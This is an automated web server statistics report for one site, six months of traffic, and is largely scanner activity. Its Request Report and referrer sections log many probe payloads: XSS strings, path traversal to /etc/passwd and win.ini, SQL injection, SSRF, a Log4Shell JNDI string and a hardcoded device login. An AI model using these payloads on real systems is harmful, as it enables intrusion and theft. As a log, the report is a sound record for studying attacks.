Web Server Statistics for hughes.a3gadvisory.com

Program started on Wed, Apr 30 2025 at 12:02 PM.
Analyzed requests from Mon, Oct 14 2024 at 3:29 AM to Wed, Apr 30 2025 at 11:34 AM (198.34 days).

General Summary

(Go To: Top | General Summary | Monthly Report | Daily Summary | Hourly Summary | Domain Report | Organization Report | Redirected Referrer Report | Failed Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Request Report)

Figures in parentheses refer to the 7-day period ending Apr 30 2025 at 12:02 PM.

Successful requests: 54,294 (2,052)
Average successful requests per day: 273 (293)
Successful requests for pages: 43,364 (1,660)
Average successful requests for pages per day: 218 (237)
Failed requests: 235,829 (10)
Redirected requests: 1,159 (0)
Distinct files requested: 2,782 (17,310)
Distinct hosts served: 233 (254)
Data transferred: 3.85 gigabytes (2.82 gigabytes)
Average data transferred per day: 19.90 megabytes (412.46 megabytes)

Monthly Report

(Go To: Top | General Summary | Monthly Report | Daily Summary | Hourly Summary | Domain Report | Organization Report | Redirected Referrer Report | Failed Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Request Report)

Each unit (+) represents 250 requests for pages or part thereof.

month#reqs#pages 
Oct 202436632892++++++++++++
Nov 202472395743+++++++++++++++++++++++
Dec 202493887533+++++++++++++++++++++++++++++++
    
Jan 202574465901++++++++++++++++++++++++
Feb 202573865882++++++++++++++++++++++++
Mar 2025112609061+++++++++++++++++++++++++++++++++++++
Apr 202579126352++++++++++++++++++++++++++

Busiest month: Mar 2025 (9,061 requests for pages).

Daily Summary

(Go To: Top | General Summary | Monthly Report | Daily Summary | Hourly Summary | Domain Report | Organization Report | Redirected Referrer Report | Failed Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Request Report)

Each unit (+) represents 1,000 requests for pages or part thereof.

day#reqs#pages 
Sun24016+
Mon5268143157++++++++++++++++++++++++++++++++++++++++++++
Tue27531+
Wed26635+
Thu27033+
Fri27638+
Sat28654+

Hourly Summary

(Go To: Top | General Summary | Monthly Report | Daily Summary | Hourly Summary | Domain Report | Organization Report | Redirected Referrer Report | Failed Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Request Report)

Each unit (+) represents 600 requests for pages or part thereof.

hour#reqs#pages 
093097696+++++++++++++
13206826323++++++++++++++++++++++++++++++++++++++++++++
294307627+++++++++++++
33429+
418571511+++
519012+
6106+
7351+
81909+
92116+
104213+
1119612+
1275+
134718+
1418710+
1598+
16254+
171847+
1844+
19298+
2018912+
211111+
223514+
231858+

Domain Report

(Go To: Top | General Summary | Monthly Report | Daily Summary | Hourly Summary | Domain Report | Organization Report | Redirected Referrer Report | Failed Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Request Report)

Listing domains, sorted by the amount of traffic.

#reqs%bytesdomain
54294100%[unresolved numerical addresses]

Organization Report

(Go To: Top | General Summary | Monthly Report | Daily Summary | Hourly Summary | Domain Report | Organization Report | Redirected Referrer Report | Failed Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Request Report)

Listing the top 20 organizations by the number of requests, sorted by the number of requests.

#reqs%bytesorganization
4710994.68%62.210
5280 5.32%51
1638 10
37 34
22 35
14 205.169
14 205.210
10 54
10 3
9 194.26
9 45
8 198.235
7 104
5 13
5 199.45
5 162.142
5 87
5 88
5 164.92
4 18
93 [not listed: 52 organizations]

Redirected Referrer Report

(Go To: Top | General Summary | Monthly Report | Daily Summary | Hourly Summary | Domain Report | Organization Report | Redirected Referrer Report | Failed Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Request Report)

Listing referring URLs, sorted by the number of redirected requests.

#reqsURL
87http://hughes.a3gadvisory.com/admin

Failed Referrer Report

(Go To: Top | General Summary | Monthly Report | Daily Summary | Hourly Summary | Domain Report | Organization Report | Redirected Referrer Report | Failed Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Request Report)

Listing the top 30 referring URLs by the number of failed requests, sorted by the number of failed requests.

#reqsURL
4001http://hughes.a3gadvisory.com/
116http://hughes.a3gadvisory.com/info.html
87http://hughes.a3gadvisory.comadmin/view:modules/load_module:users
58hughes.a3gadvisory.com:80
58http://hughes.a3gadvisory.com/login_pic.asp
58http://hughes.a3gadvisory.com/api/jsonws
58  http://hughes.a3gadvisory.com/api/jsonws?contextName=&signature=/expandocolumn/add-column-4-tableId-name-type-defaultData
58http://hughes.a3gadvisory.com/tools.cgi
58hughes.a3gadvisory.com:80/maint/index.php
58  hughes.a3gadvisory.com:80/maint/index.php?packages
58http://hughes.a3gadvisory.com/webadmin/admin/service_manager_data.php
54http://hughes.a3gadvisory.com/login
25  http://hughes.a3gadvisory.com/login?then=/oauth/authorize?client_id=openshift-web-console&idp=basic&redirect_uri=http://hughes.a3gadvisory.com:80/console/oauth&response_type
50http://hughes.a3gadvisory.com/mainFrame.htm
29http://hughes.a3gadvisory.com/zms/admin/index.php
29http://hughes.a3gadvisory.com/secure/Signup.jspa
29http://hughes.a3gadvisory.com/login.php
29http://interact.sh/127.0.0.1.html
29http://hughes.a3gadvisory.com/controller/ping.php
29hughes.a3gadvisory.com:80/MUP
29http://hughes.a3gadvisory.com/user_add.php
29http://hughes.a3gadvisory.com/-/graphql-explorer
29http://hughes.a3gadvisory.com/tos/index.php
29  http://hughes.a3gadvisory.com/tos/index.php?user/login
29http://hughes.a3gadvisory.com/admin/
29hughes.a3gadvisory.com:80/module/login/login.html
29http://hughes.a3gadvisory.com/page/index.html
29http://hughes.a3gadvisory.com/zentao/user-login.html
29http://hughes.a3gadvisory.com/app/
29https://hughes.a3gadvisory.com:80/
29hughes.a3gadvisory.com:80/user/register
29http://hughes.a3gadvisory.com/app/login.py
29http://hughes.a3gadvisory.com/servicedesk/customer/user/signup
29http://hughes.a3gadvisory.com/document-stores
454[not listed: 19 URLs]

Referring Site Report

(Go To: Top | General Summary | Monthly Report | Daily Summary | Hourly Summary | Domain Report | Organization Report | Redirected Referrer Report | Failed Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Request Report)

Listing referring sites, sorted by the number of requests.

#reqssite
274http://hughes.a3gadvisory.com/
50${jndi:ldap:/
1https://www.google.com.br/
1https://webmail.roviovet.dev.trival.fi/

Browser Report

(Go To: Top | General Summary | Monthly Report | Daily Summary | Hourly Summary | Domain Report | Organization Report | Redirected Referrer Report | Failed Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Request Report)

Listing the top 40 browsers by the number of requests for pages, sorted by the number of requests for pages.

#reqs#pagesbrowser
5209842826Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36 (RecordedFuture-ASI)
174174python-requests/2.31.0
3838python-requests/2.32.3
3535Go-http-client/1.1
2929Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36
2626Mozilla/5.0 (compatible)
1616Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
1313Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com
99Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
88Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36
77Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0
77Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
66Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)
66Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)
66Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
55Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
44Mozilla/5.0 (Linux; Android 6.0; HTC One M9 Build/MRA7025) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.8109.98 Mobile Safari/537.3
44Mozilla/5.0 \\(Windows NT 10.0\\; Win64\\; x64\\) AppleWebKit/537.36 \\(KHTML, like Gecko\\) Chrome/100.0.4896.60 Safari/537.36
44Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36
44Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36
44Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.104 Safari/537.36
44Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
44Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
33Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
33Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/125.0.6422.60 Safari/537.36
33Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
33Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
33Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3
22Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36
22Mozilla/5.0 (Linux; Android 14) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.5993.80 Mobile Safari/537.36
22Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19582
22Mozilla/5.0 (iPhone; CPU iPhone OS 17_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/123.0.6312.52 Mobile/15E148 Safari/604.1
22Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/121.0.0.0
22Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 Chrome/120.0.0.0
22Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
22Mozilla/5.0 (Linux; Android 8.0.0; SM-G965U Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36
11Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
11curl/8.1.2
11Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0
11Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.3; rb.gy/qyzae5) Chrome/124.0.0.0 Safari/537.36
167518[not listed: 20 browsers]

Browser Summary

(Go To: Top | General Summary | Monthly Report | Daily Summary | Hourly Summary | Domain Report | Organization Report | Redirected Referrer Report | Failed Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Request Report)

Listing browsers with at least 1 request for a page, sorted by the number of requests for pages.

##reqs#pagesbrowser
15223742965Safari
 5223242960  Safari/537
 22  Safari/534
 22  Safari/604
 11  Safari/9537
2213213python-requests
 213213  python-requests/2
37556Netscape (compatible)
43535Go-http-client
 3535  Go-http-client/1
51313Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses
 1313  Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains
644Mozilla
733Firefox
 11  Firefox/134
 11  Firefox/125
 11  Firefox/25
822curl
 11  curl/8
 11  curl/7
911MSIE
 11  MSIE/6
 16380[not listed: 1 browser]

Operating System Report

(Go To: Top | General Summary | Monthly Report | Daily Summary | Hourly Summary | Domain Report | Organization Report | Redirected Referrer Report | Failed Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Request Report)

Listing operating systems, sorted by the number of requests for pages.

##reqs#pagesOS
15214242870Macintosh
21976319OS unknown
37070Windows
 6363  Windows NT
 66  Unknown Windows
 11  Windows CE
43333Unix
 3333  Linux

Status Code Report

(Go To: Top | General Summary | Monthly Report | Daily Summary | Hourly Summary | Domain Report | Organization Report | Redirected Referrer Report | Failed Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Request Report)

Listing status codes, sorted numerically.

#reqsstatus code
54294200 OK
221301 Document moved permanently
938302 Document found elsewhere
58400 Bad request
235771404 Document not found

File Size Report

(Go To: Top | General Summary | Monthly Report | Daily Summary | Hourly Summary | Domain Report | Organization Report | Redirected Referrer Report | Failed Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Request Report)

size#reqs%bytes
06073.12%
1B- 10B0 
11B- 100B53446 0.02%
101B- 1kB0 
1kB- 10kB174 0.01%
10kB-100kB609 0.52%
100kB- 1MB0 
1MB- 10MB0 
10MB-100MB0 
100MB- 1GB526.33%

File Type Report

(Go To: Top | General Summary | Monthly Report | Daily Summary | Hourly Summary | Domain Report | Organization Report | Redirected Referrer Report | Failed Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Request Report)

Listing extensions with at least 0.1% of the traffic, sorted by the amount of traffic.

#reqs%bytesextension
173.12%.tar
526.33%.zip [Zip archives]
43310 0.29%[directories]
8330 0.14%.php [PHP]
2594 0.13%[not listed: 5 extensions]

Directory Report

(Go To: Top | General Summary | Monthly Report | Daily Summary | Hourly Summary | Domain Report | Organization Report | Redirected Referrer Report | Failed Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Request Report)

Listing directories with at least 0.01% of the traffic, sorted by the amount of traffic.

#reqs%bytesdirectory
5090399.49%[root directory]
580 0.50%/webmail/
2757 0.01%[not listed: 6 directories]

Request Report

(Go To: Top | General Summary | Monthly Report | Daily Summary | Hourly Summary | Domain Report | Organization Report | Redirected Referrer Report | Failed Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Request Report)

Listing files with at least 20 requests, sorted by the number of requests.

#reqs%byteslast timefile
42828 0.01%Apr/30/25 1:08 AM/
87 Apr/28/25 2:46 AM  /?q=user/login
58 Apr/28/25 2:47 AM  /?phpinfo=1
29 Apr/28/25 2:47 AM  /?k304=y%0D%0A%0D%0A<img+src%3Dcopyparty+onerror%3Dalert(document.domain)>
29 Apr/28/25 2:47 AM  /?admin_email='>"<svg/onload=confirm('xss-admin_email')>&code='>"<svg/onload=confirm('xss-code')>&dump='>"<svg/onload=confirm('xss-dump')>&item='>"<svg/onload=confirm('xss-item')>&timezone='>"<svg/onload=confirm('xss-timezone')>&blog_public='>"<svg/onload=confirm('xss-blog_public')>&add='>"<svg/onload=confirm('xss-add')>&enable='>"<svg/onload=confirm('xss-enable')>&customized='>"<svg/onload=confirm('xss-customized')>&admin_password='>"<svg/onload=confirm('xss-admin_password')>&keywords='>"<svg/onload=confirm('xss-keywords')>&timestamp='>"<svg/onload=confirm('xss-timestamp')>&label='>"<svg/onload=confirm('xss-label')>&g='>"<svg/onload=confirm('xss-g')>
29 Apr/28/25 2:47 AM  /?PagePrincipale/rss&id=1'<script>alert(document.domain)</script>
29 Apr/28/25 2:44 AM  /?q=views/ajax/autocomplete/user/a
29 Apr/28/25 2:46 AM  /?data[performredirect]="><script>alert(document.domain)</script>&page=login
29 Apr/28/25 2:46 AM  /?c=../../../../../../etc/passwd%00
29 Apr/28/25 2:47 AM  /?order_id='>"<svg/onload=confirm('xss-order_id')>&cookie='>"<svg/onload=confirm('xss-cookie')>&debug='>"<svg/onload=confirm('xss-debug')>&m='>"<svg/onload=confirm('xss-m')>&dir='>"<svg/onload=confirm('xss-dir')>&new_role='>"<svg/onload=confirm('xss-new_role')>&trashed='>"<svg/onload=confirm('xss-trashed')>&log='>"<svg/onload=confirm('xss-log')>&excerpt='>"<svg/onload=confirm('xss-excerpt')>&settings-updated='>"<svg/onload=confirm('xss-settings-updated')>&plugins='>"<svg/onload=confirm('xss-plugins')>&modify='>"<svg/onload=confirm('xss-modify')>&pwd='>"<svg/onload=confirm('xss-pwd')>&file='>"<svg/onload=confirm('xss-file')>
29 Apr/28/25 2:47 AM  /?uname='>"<svg/onload=confirm('xss-uname')>&command='>"<svg/onload=confirm('xss-command')>&reverse='>"<svg/onload=confirm('xss-reverse')>&cancel='>"<svg/onload=confirm('xss-cancel')>&h='>"<svg/onload=confirm('xss-h')>&logout='>"<svg/onload=confirm('xss-logout')>&section='>"<svg/onload=confirm('xss-section')>&gid='>"<svg/onload=confirm('xss-gid')>&input='>"<svg/onload=confirm('xss-input')>&post_type='>"<svg/onload=confirm('xss-post_type')>&page='>"<svg/onload=confirm('xss-page')>&updated='>"<svg/onload=confirm('xss-updated')>&charset='>"<svg/onload=confirm('xss-charset')>&v='>"<svg/onload=confirm('xss-v')>
29 Apr/28/25 2:49 AM  /?feed=rss2
29 Apr/28/25 2:46 AM  /?username=zyfwp&password=PrOw!aN_fXp
29 Apr/28/25 2:44 AM  /?phpinfo=-1
29 Apr/28/25 2:46 AM  /?Command=NOOP&InternalFile=../../../../../../../../../../../../../../Windows/win.ini&NewWebClient=1
29 Apr/28/25 2:47 AM  /?image='>"<svg/onload=confirm('xss-image')>&id='>"<svg/onload=confirm('xss-id')>&order='>"<svg/onload=confirm('xss-order')>&sid='>"<svg/onload=confirm('xss-sid')>&language='>"<svg/onload=confirm('xss-language')>&filter='>"<svg/onload=confirm('xss-filter')>&import='>"<svg/onload=confirm('xss-import')>&st='>"<svg/onload=confirm('xss-st')>&act='>"<svg/onload=confirm('xss-act')>&object='>"<svg/onload=confirm('xss-object')>&insert='>"<svg/onload=confirm('xss-insert')>&task='>"<svg/onload=confirm('xss-task')>&dismiss='>"<svg/onload=confirm('xss-dismiss')>&orderby='>"<svg/onload=confirm('xss-orderby')>
29 Apr/28/25 2:47 AM  /?SPX_KEY=staging&SPX_UI_URI=/
29 Apr/28/25 2:47 AM  /?option='>"<svg/onload=confirm('xss-option')>&server='>"<svg/onload=confirm('xss-server')>&admin='>"<svg/onload=confirm('xss-admin')>&create='>"<svg/onload=confirm('xss-create')>&template='>"<svg/onload=confirm('xss-template')>&number='>"<svg/onload=confirm('xss-number')>&lastname='>"<svg/onload=confirm('xss-lastname')>&multi_number='>"<svg/onload=confirm('xss-multi_number')>&size='>"<svg/onload=confirm('xss-size')>&tax='>"<svg/onload=confirm('xss-tax')>&sql='>"<svg/onload=confirm('xss-sql')>&show_sticky='>"<svg/onload=confirm('xss-show_sticky')>&attachments='>"<svg/onload=confirm('xss-attachments')>&_method='>"<svg/onload=confirm('xss-_method')>
29 Apr/28/25 2:46 AM  /?return_url=javascript:alert(document.domain)
29 Apr/28/25 2:47 AM  /?SPX_KEY=production&SPX_UI_URI=/
29 Apr/28/25 2:47 AM  /?SPX_KEY=devel&SPX_UI_URI=/
29 Apr/28/25 2:46 AM  /?key='>"<svg/onload=confirm('xss')>
29 Apr/28/25 2:47 AM  /?BazaR&vue=saisir&action=saisir_fiche&id=2
29 Apr/28/25 2:46 AM  /?uid="><script>alert(document.domain)</script>
29 Apr/28/25 2:47 AM  /?PagePrincipale/rss&id=1'+and+extractvalue(0x0a,concat(0x0a,(select+concat_ws(0x207c20,md5(999999999),1,user()))))--+-
29 Apr/28/25 2:47 AM  /?rememberme='>"<svg/onload=confirm('xss-rememberme')>&module='>"<svg/onload=confirm('xss-module')>&comment_ID='>"<svg/onload=confirm('xss-comment_ID')>&client_id='>"<svg/onload=confirm('xss-client_id')>&noheader='>"<svg/onload=confirm('xss-noheader')>&del='>"<svg/onload=confirm('xss-del')>&media='>"<svg/onload=confirm('xss-media')>&user_name='>"<svg/onload=confirm('xss-user_name')>&country='>"<svg/onload=confirm('xss-country')>&phone='>"<svg/onload=confirm('xss-phone')>&sidebar='>"<svg/onload=confirm('xss-sidebar')>&version='>"<svg/onload=confirm('xss-version')>&widget_id='>"<svg/onload=confirm('xss-widget_id')>&class='>"<svg/onload=confirm('xss-class')>
29 Apr/28/25 2:47 AM  /?next='>"<svg/onload=confirm('xss-next')>&preview='>"<svg/onload=confirm('xss-preview')>&shortcode='>"<svg/onload=confirm('xss-shortcode')>&features='>"<svg/onload=confirm('xss-features')>&mode='>"<svg/onload=confirm('xss-mode')>&out_trade_no='>"<svg/onload=confirm('xss-out_trade_no')>&category='>"<svg/onload=confirm('xss-category')>&replytocom='>"<svg/onload=confirm('xss-replytocom')>&from='>"<svg/onload=confirm('xss-from')>&start='>"<svg/onload=confirm('xss-start')>&value='>"<svg/onload=confirm('xss-value')>&range='>"<svg/onload=confirm('xss-range')>&table='>"<svg/onload=confirm('xss-table')>&limit='>"<svg/onload=confirm('xss-limit')>
29 Apr/28/25 2:47 AM  /?xmlcontrol=body onload=alert(document.domain)
29 Apr/28/25 2:47 AM  /?title='>"<svg/onload=confirm('xss-title')>&view='>"<svg/onload=confirm('xss-view')>&context='>"<svg/onload=confirm('xss-context')>&passwd='>"<svg/onload=confirm('xss-passwd')>&count='>"<svg/onload=confirm('xss-count')>&delete='>"<svg/onload=confirm('xss-delete')>&test='>"<svg/onload=confirm('xss-test')>&hash='>"<svg/onload=confirm('xss-hash')>&csrf_token='>"<svg/onload=confirm('xss-csrf_token')>&o='>"<svg/onload=confirm('xss-o')>&activate='>"<svg/onload=confirm('xss-activate')>&edit='>"<svg/onload=confirm('xss-edit')>&ip='>"<svg/onload=confirm('xss-ip')>&r='>"<svg/onload=confirm('xss-r')>
29 Apr/28/25 2:47 AM  /?redirect=../../../../windows/win.ini
29 Apr/28/25 2:47 AM  /?BazaR&vue=consulter
29 Apr/28/25 2:47 AM  /?action=stream
29 Apr/28/25 2:47 AM  /?url=../../../../../../windows/win.ini
29 Apr/28/25 2:47 AM  /?SPX_KEY=stag&SPX_UI_URI=/
29 Apr/28/25 2:46 AM  /?file=http://0177.0.0.1/etc/passwd
29 Apr/28/25 2:47 AM  /?num='>"<svg/onload=confirm('xss-num')>&drop='>"<svg/onload=confirm('xss-drop')>&g-recaptcha-response='>"<svg/onload=confirm('xss-g-recaptcha-response')>&field_id='>"<svg/onload=confirm('xss-field_id')>&user_email='>"<svg/onload=confirm('xss-user_email')>&alias='>"<svg/onload=confirm('xss-alias')>&ref='>"<svg/onload=confirm('xss-ref')>&save='>"<svg/onload=confirm('xss-save')>&enabled='>"<svg/onload=confirm('xss-enabled')>&year='>"<svg/onload=confirm('xss-year')>&checked='>"<svg/onload=confirm('xss-checked')>&post_ID='>"<svg/onload=confirm('xss-post_ID')>&files='>"<svg/onload=confirm('xss-files')>&text-color='>"<svg/onload=confirm('xss-text-color')>
29 Apr/28/25 2:46 AM  /?host=http://0177.0.0.1/server-status
29 Apr/28/25 2:47 AM  /?review_id=1&itwed"onmouseover="confirm(document.domain)"style="position:absolute%3bwidth:100%25%3bheight:100%25%3btop:0%3bleft:0%3b"b7yzn=1
29 Apr/28/25 2:46 AM  /?lang=../../../../../usr/local/php/pearcmd
29 Apr/28/25 2:47 AM  /?tags='>"<svg/onload=confirm('xss-tags')>&e='>"<svg/onload=confirm('xss-e')>&users='>"<svg/onload=confirm('xss-users')>&format='>"<svg/onload=confirm('xss-format')>&dl='>"<svg/onload=confirm('xss-dl')>&position='>"<svg/onload=confirm('xss-position')>&url='>"<svg/onload=confirm('xss-url')>&theme='>"<svg/onload=confirm('xss-theme')>&firstname='>"<svg/onload=confirm('xss-firstname')>&fields='>"<svg/onload=confirm('xss-fields')>&form='>"<svg/onload=confirm('xss-form')>&level='>"<svg/onload=confirm('xss-level')>&month='>"<svg/onload=confirm('xss-month')>&oauth_verifier='>"<svg/onload=confirm('xss-oauth_verifier')>
29 Apr/28/25 2:46 AM  /?q=20) %3D 1 OR (select utl_inaddr.get_host_name((SELECT version FROM v$instance)) from dual) is null OR (1+1
29 Apr/28/25 2:46 AM  /?rand=1679996611398&controller=authentication&SubmitCreate=1&ajax=true&email_create=a&back=xss onfocus%3dalert(document.domain) autofocus%3d xss&token=6c62b773f1b284ac4743871b300a0c4d
29 Apr/28/25 2:47 AM  /?ajax='>"<svg/onload=confirm('xss-ajax')>&timezone_string='>"<svg/onload=confirm('xss-timezone_string')>&group='>"<svg/onload=confirm('xss-group')>&update='>"<svg/onload=confirm('xss-update')>&revision='>"<svg/onload=confirm('xss-revision')>&referer='>"<svg/onload=confirm('xss-referer')>&index='>"<svg/onload=confirm('xss-index')>&src='>"<svg/onload=confirm('xss-src')>&end_date='>"<svg/onload=confirm('xss-end_date')>&gmt_offset='>"<svg/onload=confirm('xss-gmt_offset')>&params='>"<svg/onload=confirm('xss-params')>&html='>"<svg/onload=confirm('xss-html')>&pass='>"<svg/onload=confirm('xss-pass')>&offset='>"<svg/onload=confirm('xss-offset')>
29 Apr/28/25 2:47 AM  /?u='>"<svg/onload=confirm('xss-u')>&groups='>"<svg/onload=confirm('xss-groups')>&signup_for='>"<svg/onload=confirm('xss-signup_for')>&user_id='>"<svg/onload=confirm('xss-user_id')>&type='>"<svg/onload=confirm('xss-type')>&desc='>"<svg/onload=confirm('xss-desc')>&newcontent='>"<svg/onload=confirm('xss-newcontent')>&foo='>"<svg/onload=confirm('xss-foo')>&message='>"<svg/onload=confirm('xss-message')>&d='>"<svg/onload=confirm('xss-d')>&width='>"<svg/onload=confirm('xss-width')>&_wp_http_referer='>"<svg/onload=confirm('xss-_wp_http_referer')>&post_status='>"<svg/onload=confirm('xss-post_status')>&author='>"<svg/onload=confirm('xss-author')>
29 Apr/28/25 2:47 AM  /?callback='>"<svg/onload=confirm('xss-callback')>&weblog_title='>"<svg/onload=confirm('xss-weblog_title')>&check='>"<svg/onload=confirm('xss-check')>&overwrite='>"<svg/onload=confirm('xss-overwrite')>&prefix='>"<svg/onload=confirm('xss-prefix')>&l='>"<svg/onload=confirm('xss-l')>&token='>"<svg/onload=confirm('xss-token')>&start_date='>"<svg/onload=confirm('xss-start_date')>&direction='>"<svg/onload=confirm('xss-direction')>&ID='>"<svg/onload=confirm('xss-ID')>&pid='>"<svg/onload=confirm('xss-pid')>&to='>"<svg/onload=confirm('xss-to')>&checkemail='>"<svg/onload=confirm('xss-checkemail')>&menu-locations='>"<svg/onload=confirm('xss-menu-locations')>
29 Apr/28/25 2:46 AM  /?redirect=/\\interact.sh
29 Apr/28/25 2:46 AM  /?action=send2friend&artlang=aaaa"><script>alert(document.domain)</script>
29 Apr/28/25 2:47 AM  /?deleted='>"<svg/onload=confirm('xss-deleted')>&search='>"<svg/onload=confirm('xss-search')>&action='>"<svg/onload=confirm('xss-action')>&newname='>"<svg/onload=confirm('xss-newname')>&info='>"<svg/onload=confirm('xss-info')>&content='>"<svg/onload=confirm('xss-content')>&signature='>"<svg/onload=confirm('xss-signature')>&noconfirmation='>"<svg/onload=confirm('xss-noconfirmation')>&field='>"<svg/onload=confirm('xss-field')>&output='>"<svg/onload=confirm('xss-output')>&city='>"<svg/onload=confirm('xss-city')>&rename='>"<svg/onload=confirm('xss-rename')>&mail='>"<svg/onload=confirm('xss-mail')>&term='>"<svg/onload=confirm('xss-term')>
